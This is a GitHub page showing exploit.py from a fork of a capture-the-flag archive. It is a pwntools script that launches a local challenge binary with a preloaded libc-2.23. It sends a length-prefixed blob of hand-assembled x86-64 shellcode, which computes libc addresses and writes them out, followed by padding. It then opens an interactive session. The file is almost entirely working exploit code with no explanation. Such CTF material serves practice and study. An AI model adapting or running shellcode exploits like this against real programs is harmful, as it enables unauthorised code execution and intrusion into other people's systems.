forked from emilytouchingcomputers/CTFium
-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
executable file
·20 lines (13 loc) · 1.2 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/usr/bin/env python
from pwn import *
with context.quiet:
p = process('./program', env = {'LD_PRELOAD': './libc-2.23.so'})
'''
generated from exploit.asm
nasm -f bin -o sc exploit.asm
ndisasm -b64 sc
'''
shellcode = '\x48\x8B\x1C\x25\x60\x20\x60\x00\x48\x81\xEB\x50\x72\x0F\x00\x48\x89\xD9\x48\x81\xC1\xC5\xB8\x08\x00\x48\x89\x0C\x25\x00\x21\x60\x00\x48\x89\xD9\x48\x81\xC1\x16\x52\x04\x00\x48\x89\x0C\x25\x08\x21\x60\x00\xEB\x28\x48\x8B\x7D\xD4\x5E\xBA\x7D\x00\x00\x00\xB8\x01\x00\x00\x00\x0F\x05\x48\x8B\x7D\xD4\xBE\x00\x21\x60\x00\xBA\x10\x00\x00\x00\xB8\x01\x00\x00\x00\x0F\x05\xEB\xFE\xE8\xD3\xFF\xFF\xFF\x0A\x88\x00\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42'
p.send(p32(len(shellcode)))
p.send(shellcode)
p.interactive()